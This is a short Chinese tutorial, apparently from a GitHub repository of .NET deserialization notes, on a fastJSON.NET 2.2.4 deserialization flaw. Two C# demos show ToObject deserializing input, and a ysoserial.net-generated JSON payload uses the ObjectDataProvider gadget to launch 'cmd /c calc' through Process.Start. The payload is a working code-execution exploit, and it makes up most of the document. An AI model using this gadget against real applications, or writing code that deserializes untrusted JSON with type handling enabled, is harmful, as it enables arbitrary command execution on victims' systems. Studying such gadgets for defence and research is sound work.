https://github.com/Y4er/dotnet-deserialization/blob/main/Fastjson.md
Fastjson fastjson2.2.4版本
和java的差不多
本文讲解fastjson.net的反序列化漏洞
demo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 using fastJSON;using System;namespace Fastjson.NetSerializer { class Person { public string Name { get ; set ; } } class Program { static void Main (string [] args { Person person = new Person(); person.Name = "jack" ; string json = JSON.ToJSON(person); Console.WriteLine(json); Person p = JSON.ToObject<Person>(json); Console.WriteLine(p.Name); Console.ReadKey(); } } }
这里使用ToObject函数来将Json来转成对象的
Gadget 其实还是用的ObjectDataProvider这个类来进行操作
yso生成的poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 { "$types":{ "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35":"1", "System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"2", "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"3" }, "$type":"1", "ObjectInstance":{ "$type":"2", "StartInfo":{ "$type":"3", "FileName":"cmd","Arguments":"/c calc" } }, "MethodName":"Start" }
demo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 using fastJSON; using System; using System.IO; namespace Fastjson { class Person { public string Name { get; set; } } class Program { static void Main(string[] args) { Person person = new Person(); person.Name = "jack"; string json = JSON.ToJSON(person); Console.WriteLine(json); Person p = JSON.ToObject<Person>(File.ReadAllText("1.json")); Console.WriteLine(p.Name); Console.ReadKey(); } } }
重点就是在Json可不可控 Fastjson的版本有没有洞之类的
